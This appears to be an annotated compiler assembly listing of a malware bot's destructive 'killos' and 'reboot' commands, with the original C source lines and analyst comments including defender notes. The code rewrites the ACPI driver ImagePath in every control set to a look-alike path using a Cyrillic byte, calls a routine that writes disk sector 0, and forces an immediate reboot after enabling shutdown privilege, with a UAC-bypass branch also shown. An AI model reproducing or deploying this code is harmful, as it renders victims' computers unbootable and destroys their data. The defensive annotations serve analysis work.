EXTRN	?m_lstrcpy@@YGXPADPBD@Z:PROC			; m_lstrcpy
;	COMDAT ??_C@_09JMMKOPDJ@ImagePath?$AA@
CONST	SEGMENT
; Registry value name rewritten by KillOs2 under each ...\services\ACPI key.
??_C@_09JMMKOPDJ@ImagePath?$AA@ DB 'ImagePath', 00H	; `string'
CONST	ENDS
;	COMDAT ??_C@_0P@GPJKKLCO@?2services?2ACPI?$AA@
CONST	SEGMENT
; Key-path suffix; the full path is SYSTEM\<control set>\services\ACPI.
??_C@_0P@GPJKKLCO@?2services?2ACPI?$AA@ DB '\services\ACPI', 00H ; `string'
CONST	ENDS
;	COMDAT ??_C@_07HCDGMPEB@SYSTEM?2?$AA@
CONST	SEGMENT
??_C@_07HCDGMPEB@SYSTEM?2?$AA@ DB 'SYSTEM\', 00H	; `string'
CONST	ENDS
;	COMDAT ??_C@_0BK@PHPGFLJ@system32?2drivers?2A?QPI?4sys?$AA@
CONST	SEGMENT
; The replacement ImagePath.  Note the raw byte 0d1H where 'C' of
; "ACPI.sys" should be: in the CP1251 code page this is a Cyrillic letter
; that renders like Latin C, so the value looks untouched in a registry
; editor but no longer names the real driver file.  (The same byte broke
; the C source comment lines in the KillOs2 listing below.)  A non-ASCII
; byte inside a driver ImagePath is an easy hunting query for defenders.
??_C@_0BK@PHPGFLJ@system32?2drivers?2A?QPI?4sys?$AA@ DB 'system32\drivers'
	DB	'\A', 0d1H, 'PI.sys', 00H			; `string'
CONST	ENDS
;	COMDAT ??_C@_0BC@KEFDNJNC@CurrentControlSet?$AA@
CONST	SEGMENT
; The three control sets KillOs2 iterates, so the change survives a
; "last known good" boot as well as the current one.
??_C@_0BC@KEFDNJNC@CurrentControlSet?$AA@ DB 'CurrentControlSet', 00H ; `string'
CONST	ENDS
;	COMDAT ??_C@_0O@DMMDAJLG@ControlSet002?$AA@
CONST	SEGMENT
??_C@_0O@DMMDAJLG@ControlSet002?$AA@ DB 'ControlSet002', 00H ; `string'
CONST	ENDS
;	COMDAT ??_C@_0O@BHOOFKHF@ControlSet001?$AA@
CONST	SEGMENT
??_C@_0O@BHOOFKHF@ControlSet001?$AA@ DB 'ControlSet001', 00H ; `string'
; Function compile flags: /Ogspy
CONST	ENDS
;	COMDAT ?KillOs2@@YA_NXZ
_TEXT	SEGMENT
; ---------------------------------------------------------------------
; bool KillOs2(void)                                   (__cdecl, COMDAT)
;   Destructive routine #2.  For each of ControlSet001, ControlSet002 and
;   CurrentControlSet it builds "SYSTEM\<set>\services\ACPI", opens that
;   key under HKEY_LOCAL_MACHINE (80000002H) with KEY_ALL_ACCESS
;   (0f003fH), and sets ImagePath (REG_SZ) to the look-alike string
;   'system32\drivers\A' 0d1H 'PI.sys' from the CONST data above — a
;   path that no longer names the real ACPI driver.  The key is closed
;   after the write; a failed open is skipped silently.
;   Returns true if at least one RegSetValueExA returned ERROR_SUCCESS.
;   The intended effect on the next boot (ACPI driver failing to load) is
;   inferred from the routine's name and the "CORRUPTED_PATH" variable;
;   the listing itself only shows the registry write.
;   Register roles: ebx = i; esi = items[i]; edi = CORRUPTED_PATH;
;   eax = scratch / return values.
;   Locals: path[260] at ebp-284, items[4] at ebp-24, key at ebp-8,
;   ret at ebp-1.
;   Defender notes: a user-mode write to ...\services\ACPI\ImagePath is a
;   high-signal registry event; the RegOpenKeyExA / RegSetValueExA /
;   RegCloseKey imports are all resolved by hash, so the string data
;   above is the static indicator.
; ---------------------------------------------------------------------
_path$73902 = -284					; size = 260
_items$ = -24						; size = 16
_key$73905 = -8						; size = 4
_ret$ = -1						; size = 1
?KillOs2@@YA_NXZ PROC					; KillOs2, COMDAT
; 43   : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
  00003	81 ec 1c 01 00
	00		 sub	 esp, 284		; 0000011cH
  00009	53		 push	 ebx
  0000a	56		 push	 esi
; 44   : 	bool ret = false;
; 45   : 	const char* items[] = { "ControlSet001", "ControlSet002", "CurrentControlSet", 0 };
; Build the NULL-terminated items[] array on the stack; ebx doubles as
; i = 0 and as the terminating NULL entry.
  0000b	b8 00 00 00 00	 mov	 eax, OFFSET ??_C@_0O@BHOOFKHF@ControlSet001?$AA@
  00010	33 db		 xor	 ebx, ebx
  00012	57		 push	 edi
  00013	c6 45 ff 00	 mov	 BYTE PTR _ret$[ebp], 0
  00017	89 45 e8	 mov	 DWORD PTR _items$[ebp], eax
  0001a	c7 45 ec 00 00
	00 00		 mov	 DWORD PTR _items$[ebp+4], OFFSET ??_C@_0O@DMMDAJLG@ControlSet002?$AA@
  00021	c7 45 f0 00 00
	00 00		 mov	 DWORD PTR _items$[ebp+8], OFFSET ??_C@_0BC@KEFDNJNC@CurrentControlSet?$AA@
  00028	89 5d f4	 mov	 DWORD PTR _items$[ebp+12], ebx
; esi = items[0]
  0002b	8b f0		 mov	 esi, eax
; 46   : 	int i = 0;
; edi = CORRUPTED_PATH, hoisted out of the loop by the optimizer.
  0002d	bf 00 00 00 00	 mov	 edi, OFFSET ??_C@_0BK@PHPGFLJ@system32?2drivers?2A?QPI?4sys?$AA@
$LL6@KillOs2:
; 47   : 	while( items[i] )
; 48   : 	{
; 49   : 	    char path[MAX_PATH];
; 50   : 		m_lstrcpy( path, "SYSTEM\\" );
; m_lstrcpy / m_lstrcat are __stdcall ("YG" in the mangled names): the
; callee pops the two arguments, hence no esp adjustment after them.
  00032	68 00 00 00 00	 push	 OFFSET ??_C@_07HCDGMPEB@SYSTEM?2?$AA@
  00037	8d 85 e4 fe ff
	ff		 lea	 eax, DWORD PTR _path$73902[ebp]
  0003d	50		 push	 eax
  0003e	e8 00 00 00 00	 call	 ?m_lstrcpy@@YGXPADPBD@Z	; m_lstrcpy
; 51   : 		m_lstrcat( path, items[i] );
  00043	56		 push	 esi
  00044	8d 85 e4 fe ff
	ff		 lea	 eax, DWORD PTR _path$73902[ebp]
  0004a	50		 push	 eax
  0004b	e8 00 00 00 00	 call	 ?m_lstrcat@@YGXPADPBD@Z	; m_lstrcat
; 52   : 		m_lstrcat( path, "\\services\\ACPI" );
  00050	68 00 00 00 00	 push	 OFFSET ??_C@_0P@GPJKKLCO@?2services?2ACPI?$AA@
  00055	8d 85 e4 fe ff
	ff		 lea	 eax, DWORD PTR _path$73902[ebp]
  0005b	50		 push	 eax
  0005c	e8 00 00 00 00	 call	 ?m_lstrcat@@YGXPADPBD@Z	; m_lstrcat
; 53   : 		HKEY key;
; 54   : 	    LONG res = (LONG)pRegOpenKeyExA( HKEY_LOCAL_MACHINE, path, 0, KEY_ALL_ACCESS, &key );
; Arguments right-to-left: &key, KEY_ALL_ACCESS (0f003fH), 0, path,
; HKEY_LOCAL_MACHINE (80000002H).
  00061	8d 45 f8	 lea	 eax, DWORD PTR _key$73905[ebp]
  00064	50		 push	 eax
  00065	68 3f 00 0f 00	 push	 983103			; 000f003fH
  0006a	6a 00		 push	 0
  0006c	8d 85 e4 fe ff
	ff		 lea	 eax, DWORD PTR _path$73902[ebp]
  00072	50		 push	 eax
  00073	68 02 00 00 80	 push	 -2147483646		; 80000002H
  00078	e8 00 00 00 00	 call	 ??$pushargEx@$01$0KKNGHPPI@$0MO@PAUHKEY__@@PADHJPAPAU1@@@YAPAXPAUHKEY__@@PADHJPAPAU0@@Z ; pushargEx<2,2866184184,206,HKEY__ *,char *,int,long,HKEY__ * *>
; __cdecl thunk: drop its five arguments.
  0007d	83 c4 14	 add	 esp, 20			; 00000014H
; 55   : 	    if( res == ERROR_SUCCESS )
; ERROR_SUCCESS == 0; any other result skips to the next control set.
  00080	85 c0		 test	 eax, eax
  00082	75 2e		 jne	 SHORT $LN4@KillOs2
; 56   : 		{
; 57   : 			// <comment text garbled in this listing by a raw 0d1H byte in the source; not recoverable here>
; 58   : 			const char* CORRUPTED_PATH = "system32\\drivers\\A" <raw byte 0d1H> "PI.sys";   (see the CONST data above)
; 59   : 			res = (LONG)pRegSetValueExA( key, "ImagePath", 0, REG_SZ, (const BYTE *)CORRUPTED_PATH, m_lstrlen(CORRUPTED_PATH) + 1 );
; cbData = m_lstrlen(CORRUPTED_PATH) + 1 (includes the terminating NUL);
; m_lstrlen is __stdcall and pops its own argument.
  00084	57		 push	 edi
  00085	e8 00 00 00 00	 call	 ?m_lstrlen@@YGKPBD@Z	; m_lstrlen
  0008a	40		 inc	 eax
  0008b	50		 push	 eax
  0008c	57		 push	 edi
; REG_SZ = 1, Reserved = 0, value name "ImagePath", hKey = key.
  0008d	6a 01		 push	 1
  0008f	6a 00		 push	 0
  00091	68 00 00 00 00	 push	 OFFSET ??_C@_09JMMKOPDJ@ImagePath?$AA@
  00096	ff 75 f8	 push	 DWORD PTR _key$73905[ebp]
  00099	e8 00 00 00 00	 call	 ??$pushargEx@$01$0DOEAAPNG@$0NL@PAUHKEY__@@PBDHHPBEK@@YAPAXPAUHKEY__@@PBDHHPBEK@Z ; pushargEx<2,1044385750,219,HKEY__ *,char const *,int,int,unsigned char const *,unsigned long>
; Drop the six thunk arguments.
  0009e	83 c4 18	 add	 esp, 24			; 00000018H
; 60   : 	        if( res == ERROR_SUCCESS )
  000a1	85 c0		 test	 eax, eax
  000a3	75 04		 jne	 SHORT $LN3@KillOs2
; 61   : 	        {
; 62   : 				DBG( "KillOs2: Success: %s = %s", path, CORRUPTED_PATH );
; 63   : 				ret = true;
; ret is sticky: one successful write makes the function return true.
  000a5	c6 45 ff 01	 mov	 BYTE PTR _ret$[ebp], 1
$LN3@KillOs2:
; 64   : 			}        
; 65   : 			else
; 66   : 			{
; 67   : 				DBG( "KillOs2: Error: %s = %s", path, CORRUPTED_PATH );
; 68   : 			}
; 69   : 	        //pRegFlushKey(key);
; 70   : 			pRegCloseKey(key);
  000a9	ff 75 f8	 push	 DWORD PTR _key$73905[ebp]
  000ac	e8 00 00 00 00	 call	 ??$pushargEx@$01$0NLDFFFDE@$0NI@PAUHKEY__@@@@YAPAXPAUHKEY__@@@Z ; pushargEx<2,3677705524,216,HKEY__ *>
; pop ecx just discards the single thunk argument (shorter than add esp,4).
  000b1	59		 pop	 ecx
$LN4@KillOs2:
; esi = items[i + 1]: _items$[ebp+ebx*4+4] with ebx still equal to i.
  000b2	8b 74 9d ec	 mov	 esi, DWORD PTR _items$[ebp+ebx*4+4]
; 71   : 		}
; 72   : 		else
; 73   : 		{
; 74   : 			DBG( "KillOs2: RegOpenKey() ERROR %d\n", res );
; 75   : 		}
; 76   : 		i++;
  000b6	43		 inc	 ebx
; Loop while items[i] != NULL (the fourth entry is the NULL sentinel).
  000b7	85 f6		 test	 esi, esi
  000b9	0f 85 73 ff ff
	ff		 jne	 $LL6@KillOs2
; 77   : 	}
; 78   : 	return ret;
  000bf	8a 45 ff	 mov	 al, BYTE PTR _ret$[ebp]
  000c2	5f		 pop	 edi
  000c3	5e		 pop	 esi
  000c4	5b		 pop	 ebx
; 79   : }
  000c5	c9		 leave
  000c6	c3		 ret	 0
?KillOs2@@YA_NXZ ENDP					; KillOs2
_TEXT	ENDS
PUBLIC	?Reboot@@YAXXZ					; Reboot
; Function compile flags: /Ogspy
;	COMDAT ?Reboot@@YAXXZ
_TEXT	SEGMENT
; ---------------------------------------------------------------------
; void Reboot(void)                                    (__cdecl, COMDAT)
;   Enables SE_SHUTDOWN_PRIVILEGE (19) for the whole process via the
;   hashed ntdll export RtlAdjustPrivilege(19, Enable = TRUE,
;   CurrentThread = FALSE, &OldValue) and, when the returned NTSTATUS is
;   non-negative (NT_SUCCESS), calls ExitWindowsEx(EWX_REBOOT | EWX_FORCE
;   = 6, 0): an immediate forced reboot that gives applications no chance
;   to save state.  Nothing is returned.
;   Stack: `push ecx` on entry reserves the 4-byte OldValue slot (so
;   _OldValue$[esp+4] is simply [esp]); the three `pop ecx` at the end
;   discard the two ExitWindowsEx arguments and that slot.
;   Defender notes: RtlAdjustPrivilege (undocumented) is used instead of
;   AdjustTokenPrivileges, which sidesteps the usual OpenProcessToken /
;   LookupPrivilegeValue sequence; privilege enable followed by a forced
;   reboot from a non-interactive process is a useful behavioural signature.
; ---------------------------------------------------------------------
_OldValue$ = -4						; size = 4
?Reboot@@YAXXZ PROC					; Reboot, COMDAT
; 94   : {
  00000	51		 push	 ecx
; 95   : 	BOOL OldValue;
; 96   : 	if (NT_SUCCESS(pRtlAdjustPrivilege(SE_SHUTDOWN_PRIVILEGE, TRUE, FALSE, (PBOOLEAN)&OldValue)))
  00001	8d 04 24	 lea	 eax, DWORD PTR _OldValue$[esp+4]
  00004	50		 push	 eax
  00005	6a 00		 push	 0
  00007	6a 01		 push	 1
  00009	6a 13		 push	 19			; 00000013H
  0000b	e8 00 00 00 00	 call	 ??$pushargEx@$04$0MCKGLBKO@$0BJO@JHHPAE@@YAPAXJHHPAE@Z ; pushargEx<5,3265704366,414,long,int,int,unsigned char *>
  00010	83 c4 10	 add	 esp, 16			; 00000010H
; NT_SUCCESS(status) is status >= 0: after `test` OF is clear, so `jl`
; fires exactly when the sign bit is set (an error NTSTATUS).
  00013	85 c0		 test	 eax, eax
  00015	7c 0b		 jl	 SHORT $LN1@Reboot
; 97   : 	pExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0);
  00017	6a 00		 push	 0
  00019	6a 06		 push	 6
  0001b	e8 00 00 00 00	 call	 ??$pushargEx@$02$0KNHAEDKE@$0BAK@HH@@YAPAXHH@Z ; pushargEx<3,2909815716,266,int,int>
  00020	59		 pop	 ecx
  00021	59		 pop	 ecx
$LN1@Reboot:
; 98   : }
  00022	59		 pop	 ecx
  00023	c3		 ret	 0
?Reboot@@YAXXZ ENDP					; Reboot
_TEXT	ENDS
PUBLIC	?ExecuteRebootCommand@@YA_NPAXPAD1@Z		; ExecuteRebootCommand
; Function compile flags: /Ogspy
;	COMDAT ?ExecuteRebootCommand@@YA_NPAXPAD1@Z
_TEXT	SEGMENT
; ---------------------------------------------------------------------
; bool ExecuteRebootCommand(void *Manager, char *Command, char *Arguments)
;   Command-dispatcher entry point for the bot's "reboot" command.  The
;   three parameters are declared (frame offsets below) but never read:
;   the body just calls Reboot() and returns true in al.
; ---------------------------------------------------------------------
_Manager$ = 8						; size = 4
_Command$ = 12						; size = 4
_Arguments$ = 16					; size = 4
?ExecuteRebootCommand@@YA_NPAXPAD1@Z PROC		; ExecuteRebootCommand, COMDAT
; 117  : 	// 
; 118  : 	Reboot();
  00000	e8 00 00 00 00	 call	 ?Reboot@@YAXXZ		; Reboot
; 119  : 	return true;
  00005	b0 01		 mov	 al, 1
; 120  : 
; 121  : }
  00007	c3		 ret	 0
?ExecuteRebootCommand@@YA_NPAXPAD1@Z ENDP		; ExecuteRebootCommand
_TEXT	ENDS
PUBLIC	?KillOs@@YA_NXZ					; KillOs
; Function compile flags: /Ogspy
;	COMDAT ?KillOs@@YA_NXZ
_TEXT	SEGMENT
; ---------------------------------------------------------------------
; bool KillOs(void)                                    (__cdecl, COMDAT)
;   Runs both destructive routines unconditionally — KillOs2 (registry)
;   first, then KillOs1 (disk sector 0) — and calls Reboot() if either of
;   them reported success.  Returns res = KillOs2() || KillOs1() in al.
;   bl holds res across the calls; ebx is callee-saved under the MS x86
;   ABI, hence the push/pop around the body.
;   Note the ordering: the registry is corrupted before the MBR write, so
;   a machine whose raw-disk open fails is still left with a broken ACPI
;   ImagePath and is then rebooted.
; ---------------------------------------------------------------------
?KillOs@@YA_NXZ PROC					; KillOs, COMDAT
; 82   : {
  00000	53		 push	 ebx
; 83   : 	bool res = KillOs2();
  00001	e8 00 00 00 00	 call	 ?KillOs2@@YA_NXZ	; KillOs2
  00006	8a d8		 mov	 bl, al
; 84   : 	if( KillOs1() ) res = true;
  00008	e8 00 00 00 00	 call	 ?KillOs1@@YA_NXZ	; KillOs1
  0000d	84 c0		 test	 al, al
  0000f	74 02		 je	 SHORT $LN2@KillOs
  00011	b3 01		 mov	 bl, 1
$LN2@KillOs:
; 85   : 	if( res )
  00013	84 db		 test	 bl, bl
  00015	74 05		 je	 SHORT $LN1@KillOs
; 86   : 	{
; 87   : 		DBG( "KillOs is success" );
; 88   : 		Reboot();
; Reboot() normally does not return (forced reboot); on failure it does,
; and res is still returned below.
  00017	e8 00 00 00 00	 call	 ?Reboot@@YAXXZ		; Reboot
$LN1@KillOs:
; 89   : 	}
; 90   : 	return res;
  0001c	8a c3		 mov	 al, bl
  0001e	5b		 pop	 ebx
; 91   : }
  0001f	c3		 ret	 0
?KillOs@@YA_NXZ ENDP					; KillOs
_TEXT	ENDS
PUBLIC	?ExecuteKillosCommand@@YA_NPAXPAD1@Z		; ExecuteKillosCommand
; Function compile flags: /Ogspy
;	COMDAT ?ExecuteKillosCommand@@YA_NPAXPAD1@Z
_TEXT	SEGMENT
; ---------------------------------------------------------------------
; bool ExecuteKillosCommand(void *Manager, char *Command, char *Arguments)
;   Command-dispatcher entry point for the bot's "killos" command.  Only
;   the #else branch of the UAC_bypassH conditional was compiled (the
;   listing emits a single instruction), so the function is a tail jump
;   to KillOs(): same stack frame, KillOs's `ret` returns to the
;   dispatcher, and its al is the bool result.  Manager, Command and
;   Arguments are never read.
; ---------------------------------------------------------------------
_Manager$ = 8						; size = 4
_Command$ = 12						; size = 4
_Arguments$ = 16					; size = 4
?ExecuteKillosCommand@@YA_NPAXPAD1@Z PROC		; ExecuteKillosCommand, COMDAT
; 102  : 	DBG( "Execute cmd KillOs" );
; 103  : #ifdef UAC_bypassH
; 104  : 	if( BOT::GetBotType() == BotBypassUAC ) //
; 105  : 		return KillOs();
; 106  : 	else
; 107  : 		if( !RunBotBypassUAC( 0, 1, 0 ) )
; 108  : 			return KillOs();
; 109  : 		return true;
; 110  : #else
; 111  : 	return KillOs();
  00000	e9 00 00 00 00	 jmp	 ?KillOs@@YA_NXZ		; KillOs
?ExecuteKillosCommand@@YA_NPAXPAD1@Z ENDP		; ExecuteKillosCommand
_TEXT	ENDS